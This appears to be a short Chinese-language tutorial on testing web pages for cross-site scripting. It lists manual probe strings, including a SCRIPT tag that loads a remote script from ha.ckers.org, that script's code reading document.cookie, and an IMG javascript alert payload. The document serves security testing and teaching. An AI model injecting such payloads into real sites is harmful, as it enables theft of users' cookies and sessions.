它指的是惡意***者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意***用戶的特殊目的。XSS屬於被動式的***,因爲其被動且不好利用,所以許多人常忽略其危害性。
當他與csrf***手法結合時,會變的很強大很可怕(個人意見)。
怎樣測試XSS呢?推薦一個好的去處:http://ha.ckers.org/xss.html
常用的簡單的手工測試方法:
1、是輸入數據('';!--"<XSS>=&{()}) 驗證輸出數據是否進行了Html轉義('';!--"<XSS>=&) 這是檢察網頁是否做了html轉義,來避免惡意腳本被執行
2、上述網站推薦的另一個方法,輸入數據 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ,檢查是否有警告框彈出。
我們可以進去看下,http://ha.ckers.org/xss.js寫了些什麼js腳本。
document.write ("This is remote text via xss.js located at ha.ckers.org " + document.cookie);
alert ("This is remote text via xss.js located at ha.ckers.org " + document.cookie);
alert ("This is remote text via xss.js located at ha.ckers.org " + document.cookie);
獲取到客戶端的cookie,然後打印出警告框,顯示當前cookie。
可以看到,一旦該腳本被執行,風險就不可控了。
3、還有圖片類也可能產生XSS,我們在圖片頭文件中這樣寫
<IMG SRC="javascript:alert('XSS');">
除此之外,還有大小寫敏感,是否帶引號等考慮,再次推薦參考
http://ha.ckers.org/xss.html